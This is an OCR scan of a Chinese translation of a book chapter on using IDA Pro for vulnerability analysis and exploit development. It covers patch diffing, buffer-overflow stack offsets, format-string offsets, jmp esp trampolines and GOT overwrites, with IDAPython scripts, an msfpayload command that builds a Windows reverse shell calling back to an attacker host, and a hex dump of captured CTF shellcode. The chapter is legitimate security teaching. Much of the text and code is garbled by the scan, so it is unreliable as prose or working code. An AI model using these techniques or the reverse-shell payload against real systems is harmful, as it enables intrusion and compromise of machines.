辑 ， 插件 ) 菜单 或 其 关联 的 热 键 ( 默认 为 CTRL-8 ) 激活 PatchDiff2。PatchDiff2 将 你 从 中 调用 该 
插件 的 数据 库 称 为 IDB1 或 “第 一 个 idb”。 激 活 后 ，PatchDiff2 将 打开 将 与 当前 打开 的 数据 库 进 
行 比 较 的 另 一 个 数据 库 ， 此 数据 库 称 为 IDB2 或 “第 二 个 idb”。 选择 第 二 个 数据 库 后 ，PatchDiff2 
将 计算 每 个 数据 库 中 每 一 个 孔 数 的 许多 辨别 性 特性 ， 包 括 各 种 类 型 的 签名 、 散 列 值 和 CRC fü. 
利用 这 些 特 性 ，PatchDiff2 将 创建 3 个 函数 列表 ,分 别称 为 “相同 的 函数 ”"、“ 不 匹配 的 函数 ”和 
“匹配 的 函数 ”。 这 些 列表 分 别 在 PatchDiff2 打开 的 新 选项 卡 式 窗口 中 显示 。 


(D 参见 http://www.zynamics.com/bindiff.html ; 

(2 参见 http://research.eeye.com/html/tools/RT20060801 -1.html. 

(3) 参见 http://corelabs.coresecurity.com/index.php?module-Wiki&action-view&type-tool&name-turbodiff, 

(4) 参见 http://www.coresecurity.com/content/core-impact-overview/, 

© 参见 http://code.google.com/p/patchdiff2, LIEGE. Alexander Pick 将 latch Diff2 用 于 OS X 的 IDA6.0。 更 多 信息 
参见 https://github.com/Alexander-pick/patchdiff-ida6。 
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“相同 的 函数 ”列表 包含 PatchDiff2 认为 在 两 个 数据 库 中 均 相 同 的 函数 的 列表 。 从 解析 角度 
看 , 你 可 能 不 会 对 这 些 函 数 感 兴趣 ， 因 为 它们 对 于 生成 的 二 进 制 文件 的 已 打 补 丁 版 本 并 未 作出 任 
何 更 改 。 

“不 匹配 的 函数 ”列表 显示 两 个 数据 库 中 根据 PatchDiff2 应 用 的 标准 彼此 不 同 的 函数 。 实 
际 上 ， 这 些 了 水 数 或 者 已 添加 到 已 打 补 丁 的 版 本 并 从 未 打 补 丁 的 版 本 中 删除 , 或 者 与 同一 二 进 制 
文件 中 的 其 他 函数 过 于 相似 ， 以 至 于 无 法 与 男 一 个 二 进 制 文件 中 的 对 应 函数 区 别 开 来 。 通过 和 仔 
细 的 手动 分 析 ， 通 常 可 以 匹配 “不 匹配 的 函数 ”列表 中 的 函数 对 。 经 验证 明 ， 手 动 比较 签名 数 
量 相同 的 函数 的 结构 是 一 个 不 错 的 主意 。 为 此 ， 最 好 是 对 基于 sig 列 的 列表 进行 排序 ， 以 便 把 
具有 相同 数量 的 签名 的 函数 放 在 一 起 列 出 。 按 sig 列 排序 的 “不 匹配 的 函数 ”列表 的 前 几 行 如 
下 所 示 。 






































File Function name Function address Sig Hash CRC 

1 sub 7CB25FE9  7CB25FE9 000000F0 F4E7267B 411C3DCC 
1 sub 7CB6814C 7CB6814C 000000FO0 F4E7267B 411C3DCC 
2 sub 7CB6819A  7CB6819A 000000FO F4E7267B 411C3DCC 
2 sub 7CB2706A 7CB2706A 000000FO0 F4E7267B 411C3DCC 





很 明显 ,文件 rh Te SCTE 2 rupp Tree. TH. PatchDiff2 无 法 确定 如 何 对 它 
们 进行 配对 。 在 使 用 C++ 标准 模板 库 (STL) 的 二 进 制 文件 中 ， 我们 常 弟 可 以 看 到 多 个 结构 相同 
的 水 数 。 如 采 你 能 够 手动 将 一 个 文件 中 的 函数 与 其 在 男 一 个 文件 中 的 对 应 函数 相 匹 配 , 就 可 以 使 
用 PatchDiff2 的 Set Match ( 设置 匹配 ) 功能 (位 于 上 下 文采 单 中 ) 在 列表 中 选择 一 个 因数 ， 然 后 
将 其 与 列表 中 的 男 一 个 子 数 相 匹 配 。Set Match 对 话 框 如 图 22-1 所 示 。 


x 
Match address | -] 


Options : 


Iv Propagate 













图 22-1 使 用 PatchDiff2 手动 匹配 函数 
HTF, ARRE JH Set Match 亲 单 项 选择 一 个 咀 数 。 在 生成 的 对 话 框 中， 你 








必须 输入 匹配 的 函数 在 你 未 查看 的 文件 中 的 地 址 。Propagate ( 传播 ) 选项 会 要 求 PatchDiff2 尽 可 
能 多 地 匹配 其 他 孙 数 ( 只 要 你 告知 它 出 现 的 新 匹配 )。 

“匹配 的 函数 ”列表 包含 PatchDiff2 根据 在 匹配 过 程 中 应 用 的 标准 认为 足够 相似 但 并 非 完全 
相同 的 函数 。 右 击 此 列表 中 的 任何 条 目 并 选择 Display Graphs ( 显示 图 形 )，PatchDiff2 将 显示 两 
个 匹配 的 函数 的 流 图 形 。 图 22-2 显示 了 一 个 这 样 的 图 形 对 。PatchDiff2 利用 颜色 编码 突出 显示 已 
添加 到 二 进 制 文件 的 已 打 补 丁 版 本 中 的 代码 块 ， 以 便于 你 重点 关注 代 码 中 已 更 改 的 部 分 。 























388 第 22 章 漏洞 分 析 





seh è [ebptvar A70] — : int 
1 ` suh 7CBü5090 ads 
[Firar A6d], emu 





图 22-2 PatchDiff2 的 图 形 化 函数 比较 


在 这 些 图 形 中 ， 两 个 也 数 中 均 包 含 代码 块 @ 到 @， 而 代码 块 @ 则 添加 到 函数 的 已 打 补 丁 版 本 
中 。 在 差异 化 分 析 过 程 中 , 最 初 你 会 对 匹配 的 图 数 最 感 兴趣 ， 因 为 它们 可 能 包含 已 合并 到 已 打 补 
本 的 二 进 制 文件 中 的 更 改 ( 这些 更 改修 复 了 原始 二 进 制 文件 中 发 现 的 漏洞 ), 仔细 人 研究 这 些 更 改 ， 
可 以 发 现 为 解决 错误 行为 或 可 利用 条 件 而 进行 的 更 正 或 添加 的 安全 检查 。 如 采 在 “匹配 的 函数 ” 
列表 中 找 不 到 任何 感 兴趣 的 突出 显示 的 更 改 , 则 “不 匹配 的 函数 ”列表 将 成 为 我 们 查找 已 打 补 丁 
的 代码 的 唯一 其 他 选项 。 

















22.3 IDA 与 破解 程序 开发 过 程 


假设 你 确定 了 一 个 可 被 利用 的 漏洞 的 位 置 , 那么 , IDA 如 何 为 你 开发 破解 程序 提供 帮助 呢 ? 
要 回答 这 个 问题 ， 你 需要 了 解 你 需要 什么 类 型 的 帮助 ， 以 便利 用 IDA 的 功能 。 
在 下 面 几 个 方面 , IDA 的 功能 非常 强大 。 在 开发 破解 程序 时 ， 这些 功能 可 以 为 你 节省 大 量 反 
复试 验 的 时 间 。 
a 在 确定 控制 流 路 径 方 面 ，IDA 图 形 非常 有 用 ， 可 以 帮助 你 了 解 如 何 到 达 一 个 易 受 攻击 的 
函数 。 对 于 大 型 二 进 制 文件 ， 你 可 能 需要 仔细 选择 生成 图 形 的 参数 ， 以 最 大 限度 地 减少 
所 生成 图 形 的 复杂 程度 。 请 参阅 第 9 章 了 解 有 关 IDA 图 形 的 更 多 信息 。 
Q IDA 对 栈 帧 进行 非常 详细 的 分 解 。 如 果 你 正 履 写 栈 中 的 信息 ，IDA 将 帮助 你 了 解 履 写 了 
什么 内 容 ， 绥 冲 区 的 哪些 部 分 履 写 了 这 些 内 容 。IDA 栈 显示 在 确定 格式 化 字符 串 的 内 存 
布局 时 ， 也 易 受 到 攻击 。 
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O IDA 提供 优良 的 搜索 工具 。 如 果 你 需要 在 一 个 二 进 制 文件 中 搜索 某 个 特定 的 指令 (如 jmp 
esp ) 或 指令 序列 ( 如 pop/pop/ret ) IDA 能够 迅速 告诉 你 该 指令 /指令 序列 是 否 存在 于 二 
进 制 文件 中 ， 如 果 存 在 ， 则 指出 该 指令 /指令 序列 所 在 位 置 的 虚拟 地 址 。 

OQ IDA 映 冉 二 进 制 文件 就 好 像 它 们 被 加 载 到 内 存 中 ， 根 据 这 一 点 ， 你 可 以 更 加 轻松 地 确定 
成 功 加 载 破解 程序 所 需 的 虚拟 地 址 。 当 你 拥有 “ 写 4””( write four) 能 力 时 ， 利 用 IDA 
的 反 汇 编 代码 清单 可 以 轻 多 确定 任何 全 局 分 配 的 缓冲 区 的 虚拟 地 址 以 及 有 用 的 目标 地 址 
(如 GOT 条 目 )。 

在 下 面 儿 节 中 ， 我 们 将 讨论 其 中 一 些 功能 ， 以 及 如 何 利 用 这 些 功 能 。 


22.3.4 $in E 


虽然 栈 保 护 机 制 正 迅速 成 为 现代 操作 系统 的 标准 功能 , 但 许多 计算 机 的 操作 系统 仍然 允许 在 
栈 中 运行 代码 ， 基 于 栈 的 普通 缓冲 区 溢出 攻击 就 是 一 个 例子 。 即 使 操作 系统 设置 了 栈 保护 ,攻击 
者 仍然 可 以 利用 缓冲 区 溢出 破坏 基于 栈 的 指针 变量 ， 进 而 完成 一 次 攻击 。 

在 发 现 一 个 基于 栈 的 缓冲 区 溢出 后 ,无 论 你 计划 做 什么 , 一 定 要 了 解 : 当 你 的 数据 从 易 受 攻 
击 的 栈 缓冲 区 洪 出 时 ,哪些 栈 内 容 将 被 覆 写 。 你 可 能 还 逢 要 了 解 : 你 到 抵 害 要 在 绥 冲 区 中 写 入 多 
少 个 字 市 ,才能 控制 其 中 保存 的 各 种 变量 ,包括 函数 返回 地 址 。 只 要 你 做 一 些 算 术 运 和 拭 ，IDA 的 
狱 认 栈 帧 显示 窗口 将 为 你 回答 所 有 这 些 问 题 。 用 一 个 变量 的 仿 移 量 减 去 为 一 个 变量 的 仿 移 量 , 即 
可 计算 出 栈 中 任何 两 个 变量 之 间 的 距离 。 下 面 的 栈 帧 包含 一 个 缓冲 区 ,如 来 仔细 控制 相应 消 数 的 
输入 ， 可 以 使 这 个 缓冲 区 溢出 : 






































-0000009C result dd ? 

-00000098 buffer 132 db 132 dup(?) ; this can be overflowed 
-00000014 p buf dd ? ; pointer into buffer 132 
-00000010 num bytes dd ? ; bytes read per loop 
-0000000C total read dd ? ; total bytes read 
-00000008 db ? ; undefined 

-00000007 db ? ; undefined 

-00000006 db ? ; undefined 

-00000005 db ? ; undefined 

-00000004 db ? ; undefined 

-00000003 db ? ; undefined 

-00000002 db ? ; undefined 

-00000001 db ? ; undefined 

«00000000 s db 4 dup(?) 

:00000004 r db 4 dup(?) ; save return address 
-00000008 filedes dd ? ; socket descriptor 


易 受 攻击 的 缓冲 区 〈buffer_132 ) 的 开始 部 分 到 所 保存 的 返回 地 址 之 间 的 距离 为 156 4^6 8 
(4- -98h 或 4- -152 )。 我 们 还 可 以 看 到 , 在 132 个 字 节 ( -14h - -98h ) E, p buf 的 内 容 将 开始 
被 履 写 ， 这 可 能 会 造成 问题 。 在 触发 破解 程序 之 前 ,为 了 防止 目标 应 用 程序 崩 当 ,你 必须 清楚 地 








(DD“ 写 4” 能 力 使 攻击 者 有 机 会 在 他 选择 的 内 存 位 置 写 和 人 他 选 定 的 4 个 字 方 。 
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知道 ， 窗 写 缓冲 区 之 后 的 变量 ,将 会 造成 什么 样 的 后 果 。 在 这 个 例子 中 ，filedes (一 个 套 接 字 
描述 符 ) 可 能 是 男 一 个 存在 问题 的 变量 。 如 果 在 我 们 溢出 缓冲 区 之 后 , 易 受 攻击 的 也 数 需要 使 用 
该 套 接 字 描述 符 ， 那 么 ， 这 时 我 们 需要 小 心 应 付 ， 确 保 窗 写 filedes 不 会 使 该 限 数 因为 出 现 无 法 
预料 的 错误 而 中 断 。 处 理 将 要 被 履 写 的 变量 的 一 种 策略 , 是 在 这 些 变量 中 写 人 对 程序 有 意义 的 值 ， 
从 而 使 程序 能 够 继续 正常 运行 ， 直 到 破解 程序 被 触发 。 

为 了 获得 一 个 更 具 可 读 性 的 栈 帧 细 目 ， 我 们 可 以 修改 代码 清单 22-3 中 的 栈 帧 扫描 代码 ， 以 
枚 举 一 个 栈 帧 的 所 有 成 员 , 计算 它们 的 表面 大 小 , 并 显示 每 个 成 员 与 所 保存 的 返回 地 址 之 间 的 距 
离 。 最 终 的 脚本 如 代码 清单 22-4 所 示 。 


代码 清单 22-4 使 用 Python 枚 举 一 个 栈 帧 


func = ScreenEA() #process function at cursor location 
frame - GetFrame(func) 
if frame !- -1: 
Message("Enumerating stack for %s\n" % GetFunctionName(func)) 
d eip loc = GetFramelvarSize(func) + GetFrameRegsSize(func) 
prev idx - -1 
idx - 0 
while idx « GetStrucSize(frame): 
member - GetMemberName(frame, idx) 
if member is not None: 
if prev idx !- -1: 
#compute distance from previous field to current field 
delta - idx - prev idx 
Message("415s: 44d bytes (X4d bytes to eip)Wn" % \ 
(prev, delta, eip loc - prev idx)) 
prev idx - idx 
prev - member 
idx = idx + GetMemberSize(frame, idx) 























else: 
idx = idx + 1 
if prev_idx != -1: 


#make sure we print the last field in the frame 

delta = GetStrucSize(frame) - prev idx 

Message("%15s: Bad bytes (X4d bytes to eip)Wn" % \ 
(prev, delta, eip loc - prev idx)) 


这 个 脚本 引入 了 GetFramel varSize 和 GetFrameRegsSize 函数 (也 可 用 在 IDC 中 )， 分 别 用 于 
获取 一 个 栈 帧 的 局 部 变量 和 所 保存 的 寄存 右 区 域 的 大 小 。 保 存 的 返回 地 址 正好 在 这 两 个 区 域 的 下 
面 ， 保 存 的 返回 地 址 的 偏 移 量 为 这 两 个 值 的 总 和 C 9 )。 如 果 对 示例 函数 执行 这 个 脚本 ， 将 生成 
以 下 输出 : 








Enumerating stack for handleSocket 
result: 4 bytes ( 160 bytes to eip) 
buffer 132: 132 bytes ( 156 bytes to eip) 
p_buf: 4 bytes ( 24 bytes to eip) 
num bytes: 4 bytes ( 20 bytes to eip) 


22.3 IDA 与 破解 程序 开发 过 程 391 


total read: 12 bytes ( 16 bytes to eip) 
$i 4 bytes ( 4 bytes to eip) 

ES 4 bytes ( 0 bytes to eip) 

fildes: | A bytes ( -4 bytes to eip) 


EREECHEN fn] Ze) eri, 其 中 的 注释 提供 了 其 他 可 能 对 破解 程序 开发 者 有 


用 的 信息 。 


事实 证 明 , 在 开发 针对 格式 化 字符 串 漏 洞 的 入 侵 程序 时 ,IDA 的 栈 帧 显示 也 非 第 有 用 。 下 面 
的 代码 片段 提供 了 一 个 示例 ， 这 段 代 码 使 用 用 户 提 供 的 缓冲 区 《〈 作为 格式 化 字符 串 提 供 ) 调用 


fprintf PR, 





. text :080488CA lea eax, [ebp+format | 

O .text:080488D0 mov [esp+4], eax ; format 
. text :080488D4 mov eax, [ebp+streanm| 

€ .text:080488DA mov [esp], eax ; stream 
. text :080488DD call  fprintf 


这 个 示例 仪 向 fprintf 函数 传递 两 个 参数 : 一 个 文件 指针 《〈@ 0 和 作为 格式 化 字符 串 的 用 户 
缓冲 区 的 地 址 〈@ )。 这 些 参数 占用 栈 顶 部 的 两 个 位 置 ， 以 及 在 函数 的 “序言 ”阶段 已 由 实施 调 
用 的 函数 分 配 的 内 存 。 这 个 易 受 攻击 的 函数 的 栈 帧 如 代码 清单 22-5 所 示 。 


代码 清单 22-5 ”格式 化 字符 串 示 例 的 栈 帧 


€  -00000128 db ? ; undefined 
-00000127 db ? ; undefined 
-00000126 db ? ; undefined 
-00000125 db ? ; undefined 
@ -00000124 db ? ; undefined 
-00000123 db ? ; undefined 
-00000122 db ? ; undefined 
-00000121 db ? ; undefined 
-00000120 db ? ; undefined 
-0000011F db ? ; undefined 
-0000011E db ? ; undefined 
-0000011D db ? ; undefined 
-0000011C db ? ; undefined 
-0000011B db ? ; undefined 
-0000011A db ? ; undefined 
-00000119 db ? ; undefined 
-00000118 s1 dd ? ; offset 
-00000114 stream dd ? ; offset 
-00000110 format db 264 dup(?) 


bur 128h 到 119h 中 的 16 CREL LWE xz dens (此 例 中 为 gee) 为 传递 给 将 由 该 
易 受 攻击 的 函数 调用 的 函数 的 参数 预 分 配 的 内 存 块 ,fprintf 的 Stream 参数 将 位 于 栈 的 顶部 (@ ), 
格式 化 字符 串 指 针 则 紧 跟 在 stream 参数 的 后 面 ( 9). 
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在 格式 化 字符 串 入 侵 程序 中 , 攻击 者 通 第 对 从 格式 化 字符 串 指 针 到 保存 攻击 者 的 输入 的 绥 冲 
区 开头 位 置 之 间 的 距离 感 兴趣 。 在 上 一 个 栈 帧 中 ， 有 16 个 字 方 将 格式 化 学 符 串 参数 与 具体 的 格 
式 化 学 符 串 缓冲 区 分 隐 开 来 。 为 进行 深入 讨论 ， 我 们 假设 攻击 者 已 输入 以 下 格式 化 字符 串 。 











"Zx Ax 4X %X %x" 


这 时 ，fprintf 期 竺 在 格式 化 字符 串 参 数 后 紧 跟 5 个 参数 。 这 些 参数 中 的 前 四 个 参数 将 占用 
格式 化 字符 串 参 数 与 格式 化 字符 串 缓 神 区 之 间 的 空间 ， 第 五 个 参数 (也 就 是 最 后 一 个 参数 ) TER 
盖 格 式 化 缓冲 区 的 前 四 个 字 节 。 熟 悉 格 式 化 字符 串 入 侵 程序 "的 读者 知道 ， 格 式 化 字符 串 中 的 参 
数 可 以 按照 索引 号 显 式 命名 。 下 面 的 格式 化 字符 串 说 明了 如 何 访问 上 述 格式 化 字符 串 之 后 的 第 五 
个 参数 ， 以 将 其 格式 化 为 十 六 进 制 值 。 














"%5$x" 


再 回 到 上 一 个 示例 ， 这 个 格式 化 字符 串 会 将 格式 化 字符 串 缓冲 区 的 前 四 个 字 方 [前 面 我 们 提 
到 ， 这 些 字 市 将 占用 传递 给 格式 化 字符 串 ( 如 果 和 需要 一 个 格式 化 字符 串 ) 的 第 五 个 参数 的 空间 ] 
读 取 为 一 个 整数 ,将 该 整数 格式 化 为 十 六 进 制 值 ,然后 将 结 来 输出 到 指定 的 文件 流 。 传递 给 该 格 
式 化 字符 串 的 其 他 参数 ( 第 六 个 、 第 七 个 等 ) 将 窗 盖 格式 化 字符 串 绥 冲 区 中 的 后 续 四 字 市 代码 块 。 

创建 一 个 能 够 正常 运行 的 格式 化 字符 串 , 以 对 易 受 攻击 的 二 进 制 文件 加 以 利用 , TREE PR 
烦 , 并 且 这 通常 依赖 于 是 否 准 确 指定 格式 化 字符 串 中 的 参数 ,前 面 的 讨论 说 明 , 在 许多 时 候 , IDA. 
可 用 于 快速 准确 地 计算 格式 化 子 符 串 缓冲 区 中 所 需 的 仿 移 量 。 将 这 些 信息 与 IDA 在 反 汇 编 各 种 
程序 节 ( 如 全 局 偏 移 量 表 .got 或 解构 器 表 .dtor ) 时 显示 的 信息 相 结 合 ， 可 以 快速 获得 仅 使 用 调试 
价 开 发 人 侵 程 序 时 所 需 的 格式 化 字符 串 ， 而 且 不 需要 进行 试用 ， 其 中 也 不 包含 任何 错误 。 
































22.3.2. ”定位 指令 序列 


为 了 可 靠 地 加 载 破 解 程 序 ， 你 通常 可 以 使 用 一 种 特殊 的 控制 权 转 交 机 制 ， 这 种 机 制 不 需要 你 
了 解 你 的 shellcode 的 具体 内 存 地 址 。 如 果 你 的 shellcode 位 于 堆 或 栈 中 ， 其 地 址 无 法 预测 ， 则 更 需 
要 采用 这 种 机 制 。 在 这 种 情况 下 , 如 果 找 到 一 个 在 你 的 破解 程序 被 触发 时 指 问 shellcode WAA , 
则 更 加 理想 。 例 如 ， 如 果 你 在 接管 指令 指针 时 ， 已 知 ESI 寄存 融 指 向 你 的 shellcode， 那 么 如 果 该 
指令 指针 恰巧 指向 一 条 jmp esi 或 call esi 指令 ， 这 将 会 为 你 提供 极 大 的 帮助 。 因 为 这 些 指令 不 
需要 你 了 解 你 的 shellcode 的 确切 地 址 ， 就 可 以 执行 shellcode。 同 样 ， 使 用 jmp esp 指令 也 可 以 非 
常 方便 地 将 控制 权 转 交 给 你 插入 栈 中 的 shellcode。 因 为 如 果 一 个 函数 包含 易 受 攻击 的 缓冲 区 ， 当 
该 函数 返回 时 ， 栈 指针 将 指 癌 你 刚刚 覆 写 的 被 保存 的 返回 地 址 下 面 。 如 采 你 继续 禾 写 被 保存 的 返 
回 地 址 上 面 的 栈 ， 那 么 ， 栈 指针 将 指向 你 的 数据 (应 该 是 代码 )。 将 指 问 shellcode 的 寄存 器 与 通 
过 跳 转 到 或 调用 该 寄存 需 指 加 的 位 置 来 重 定 回执 行 的 指令 序列 相 结合 的 过 程 称 为 “trampoline ”。 


























中 希望 了 解 格式 化 字符 串 和 人 侵 程序 的 详细 信息 的 读者 ， 可 以 再 次 参阅 Jon Erickson 的 Hacking: The Art of Exploitation 
Second Edition 版 。 
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搜索 这 类 指令 序列 并 不 是 一 个 新 的 概念 。 在 论文 “Variations in Exploit Methods between Linux 
and Windows" 的 附录 D 中 ，David Litchfield 介绍 了 一 个 名 为 getopcode.c 的 程序 ， 这 个 程序 用 
于 在 Linux ELE 二 进 制 文件 中 搜索 有 用 的 指令 。Metasploite 项 目 提 供 了 msfpescan 工具 ,该 工具 
可 用 于 在 Windows PE 二 进 制 文 件 中 扫描 有 用 的 指令 序列 。 和 这 些 工具 一 样 ，IDA 也 能 够 定位 有 
用 的 指令 序列 。 

比方 说 ， 假 设 你 布 望 确定 一 条 jmp esp 指令 在 某 个 x86 二 进 制 文件 中 的 位 置 。 这 时 ， 你 可 以 
使 用 IDA 的 文本 搜索 功能 来 寻找 jmp esp 这 个 字符 串 。 如 有 果 你 知道 jmp 与 esp 之 间 空 格 的 确切 数 
量 ， 你 将 能 够 找到 这 个 字符 串 。 但 是 ,任何 时 候 你 都 不 可 能 找到 该 字符 串 ， 因 为 编译 需 很 少 使 用 
BE SRM HA. 为 什么 还 要 在 第 一 个 位 置 进行 搜索 呢 ? 因为 你 真正 感 兴 趣 的 并 不 是 反 汇 
编 后 的 文本 jmp esp， 而 是 字 节 序列 FF E4， 不 论 它 位 于 何 处 。 例 如 ， 下 面 的 指令 包含 一 个 内 航 
的 jmp esp: 






































.text:080486CD B8 FF FF E4 34 mov eax, 34E4FFFFh 


如 果 想 要 一 个 jmp esp, 可 以 使 用 虚拟 地 址 080486CFh ; IDA 的 二 进 制 搜索 ( Search 》 Sequence 
of Bytes ) 功能 可 以 迅速 定位 这 样 的 字 节 序列 。 如 果 对 一 个 已 知 的 字 节 序列 执行 完全 匹配 的 二 
进 制 搜索 ， 请 记得 区 分 大 小 写 ， 否 则 ， 字 节 序 列 50 C3 (push eax/ret ) 将 与 字 节 序列 70 C3 
相 匹 配 〈 因 为 50h 代表 大 写 的 P， 而 70h 代表 小 写 的 p )，70 C3 是 一 个 对 使 用 -61 字 市 的 相对 
偏 移 量 溢出 的 跳 转 。 在 IDC 中 ,使 用 FindBinary 函数 ， 可 以 通过 编程 执行 二 进 制 搜索 ， 如 下 
所 示 : 











ea = FindBinary(MinEA(), SEARCH DOWN | SEARCH CASE, "FF E4"); 


这 个 函数 以 区 分 大 小 写 的 方式 ， 从 数据 库 中 最 低 的 虚拟 地 址 向 下 ( open ) 搜索 jmp 
esp (FF E4 )。 如 来 发 现 jmp esp， 则 返回 该 子 市 序列 起 始 位 置 的 虚拟 地 址 。 如 果 没 有 找到 该 子 市 
序列 ， 则 返回 BADADDR(-1)。 读者 可 以 在 本 书 的 网 站 上 下 载 一 个 脚本 ， 它 能 够 日 动 搜索 大 量 指 
令 。 使 用 这 个 脚本 ,我们 可 以 搜索 将 控制 权 转 交 给 EDX 寄存 天 所 指 位 置 的 指令 ， 并 收 到 类 似 于 
iie: 








Searching... 

Found jmp edx (FF E2) at 0x80816e6 
Found call edx (FF D2) at 0x8048138 
Found 2 occurrences 


在 数据 库 中 搜索 指令 时 , 这 样 的 便捷 脚本 不 但 可 以 为 我 们 节省 大 量 时 间 , 还 可 以 确保 我 们 不 
会 瑟 记 考虑 到 所 有 可 能 的 情况 。 





CD 参见 http:/wwwnccgroup.conyLibraries/Document Downloads/Variations in Exploit methods between Linux and Windows. 
sflb.ashx. 
© 参见 http://www.metasploit.com/. 
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22.3.3 查找 有 用 的 虚拟 地 址 


我 们 下 面 将 要 简要 提 到 的 最 后 一 项 是 IDA 在 它 的 反 汇 编 代 码 清单 中 显示 的 虚拟 地 址 。 知 着 
我 们 的 shellcode 最 终 将 进入 一 个 静态 绥 冲 区 ( 例如， 在 .data 或 .bss 节 中 )， 总 比 知 道 shellcode 
将 加 载 到 堆 或 栈 中 要 强 ，, 因为 我 们 最 后 可 以 得 到 一 个 已 知 的 固定 地 址 , 并 可 以 将 控制 权 转 交 给 这 
个 地 址 。 因 此 ， 我 们 不 必 使 用 “NOP 1838" (NOP slide) 或 查找 特殊 的 指令 序列 。 








NOP 滑 道 

“NOoPDOO"O000000000000000000U0U0UUUUUUUD shelleode 
本 
DD shellcodeUDOOOOOODO0O00” NOPOO” OOOOOOO0” wOoPDTI "DU D 
本 
0UO0O0O00000000 shellcodeuDOO0O0O00000 s000 NOPO DU D D]. shelleode [] 
- g^ EHE ELE] D [I] [3 [8 UE BE E E 00 000000 E T 3 2. HE] EE 0 29 [HI T E 
uggmngguguggug*gug"dgamggggmaugmdutnutl shelleode[] 


Jio n] EAE IE XS BE EE TRE DAL ACE REUS , 一 些 破解 程序 则 利用 了 这 一 点 。 许 多 时 候 ， 
HAEATA FTES, 但 通常 这 个 空间 已 经 足够 了 。 如 果 可 以 进行 4 字 市 履 写 ,我 们 可 以 
用 我 们 的 shellcode 的 地 址 履 写 一 个 取 数 指针 。 许 多 ELF 二 进 制 文件 使 用 的 动态 链接 过 程 利用 一 
个 叫做 全 局 偏 移 量 表 ( global offset table ) 的 消 数 指针 表 存 储 动态 链接 的 二 进 制 也 数 的 地 址 。 如 
果 攻 击 者 能 够 履 写 这 个 表 中 的 一 个 条 目 , 那么 ， 他 们 就 可 以 “劫持 ”一 个 另 数 调 用 ， 并 将 该 调用 
重 定向 到 他 们 选择 的 位 置 。 通 稼 ， 在 这 类 情况 下 ， 攻 击 者 会 首先 将 shelleode 放置 在 一 个 已 知 的 
位 置 ， 然 后 复写 将 要 被 破解 程序 调用 的 下 一 个 库 函 数 的 GOT 条 目 。 当 这 个 库 函 数 被 调用 时 ， 控 
制 权 将 被 转交 给 攻击 者 的 shellcode。 

在 IDA 中， 通过 滚动 到 got 区 块 ， 并 搜索 我 们 和 希望 复写 其 条 目的 困 数 ， 即 可 轻易 确定 GOT 
条 目的 地 址 。 以 尽 可 能 自动 化 的 方式 ， 下 面 的 Python 脚本 能 够 迅速 报告 将 要 被 给 定 的 困 数 调用 
使 用 的 GOT 条 目的 地 址 : 



































ea = ScreenEA() 
dref = ea 
for xref in XrefsFrom(ea, 0): 
d if xref.type == fl CN and SegName(xref.to) -- ".plt": 
© for dref in DataRefsFrom(xref.to): 
Message("GOT entry for Xs is at OxX08xWM" % 
(GetFunctionName(xref.to), dref)) 
break 
if ea == dref: 
Message("Sorry this does not appear to be a library function call\n") 


KCERI EEIE ME BRABOIS E, WFR, Gr A rr, 
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. text :080513A8 call  memset 





这 个 脚本 首先 遍历 交叉 引用 ， 直 到 到 达 GOT。 测 试 获 取 的 第 一 个 交叉 引用 ( @ )， 以 确保 它 
是 一 个 调用 交叉 引用 ,并且 引用 的 是 ELF 过 程 链接 表 ( .plt )。PLT 条 目 中 的 代码 用 于 读 取 一 个 
GOT 条 上 日 ， 并 将 控制 权 转 交 给 该 GOT 条 目 指 定 的 地 址 。 脚 本 获取 的 第 二 个 交叉 引用 (Ce ) 获得 
从 PLT 中 读 取 的 位 置 的 地 址 ， 这 也 是 相关 GOT 条 目的 地 址 。 如 果 对 前 面 的 memset 函数 调用 执 
行 这 个 脚本 ， 将 生成 以 下 输出 : 




















GOT entry for .memset is at Ox080618d8 


在 我 们 通过 “劫持 ”一 个 memset 函数 调用 来 控制 相关 程序 时 ， 这 个 输出 为 我 们 提供 了 所 需 
的 信息 ， 即 我 们 需要 用 我 们 的 shellcode DI H HL 5 HE 0x080618d8 处 的 内 容 。 
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到 现在 为 止 ， 本 章 主 要 讨论 将 IDA 作为 攻击 工具 的 用 法 。 在 结束 讨论 之 前 ， 我 们 将 至 少 提 
供 一 个 示例 ， 说 明 如 何 将 IDA 用 作 防 御 性 工具 。 与 任何 其 他 二 进 制 代码 一 样 ， 要 确定 shellcode 
的 作用 ， 只 有 一 种 办 法 ， 就 是 对 它 进 行 反 汇编 。 当 然 ， 首先 你 必须 获得 一 段 shellcode。 如 末 你 的 
好 奇 心 较 重 ， 总 是 想 知道 Metasploit 有 效 负载 的 运行 机 制 ， 那 么 ， 你 只 需要 使 用 Metasploit 生成 
一 个 原始 形式 的 有 效 负 载 ， 然 后 反 汇 编 得 到 的 二 进 制 大 对 象 (blob ) 即 可 。 

下 面 的 Metasploit 命令 生成 一 个 有 效 负 载 ， 它 回调 攻击 者 计算 机 上 的 4444 端口 ， 并 为 攻击 
者 提供 目标 Windows 计算 机 上 的 一 个 shell: 











# ./msfpayload windows/shell reverse tcp LHOST-192.168.15.20 R > 
w32 reverse 4444 


生成 的 文件 包含 所 请 求 的 有 效 负 载 ， 它 为 原始 的 二 进 制 形式 。 这 个 文件 可 以 在 IDA. 中 打开 
(以 二 进 制 格式 ， 因 为 它 没 有 特定 的 格式 ), 并 通过 将 显示 的 字 节 转换 成 代码 生成 一 个 反 汇 编 代 码 
清单 。 

为 一 个 shellcode 可 能 出 现 的 地 方 是 网 络 数据 包 捕 获 ( network packet capture )。 要 确定 到 底 哪 
些 数 据 包 包含 shellcode 可 能 较为 困难 ， 不过， 你 可 以 查阅 大 量 有 关 网 络 安全 的 书 ， 它 们 会 告诉 
你 如 何 找到 所 有 这 些 恶 意 数 据 包 。 现 在 ,我 们 以 在 DEFCON 18 的 “ 夺 旗 赛 ” 网 络 中 看 到 的 一 个 
重新 汇编 的 客户 问 攻 击 数 据 流 为 例 : 














00000000 AD 02 OE 08 01 0000 00 47 43 4E 93 434B 91 90 ........ GCN. CK 

00000010 92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43  .GNF.FAJCO. AQIHC 
00000020 4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 JNKCBI.KJAGFFFC. 
00000030 4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48  NF.JC.B.F.N.BHAH 
00000040 97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09 ..H..B@K.Jj.X... 
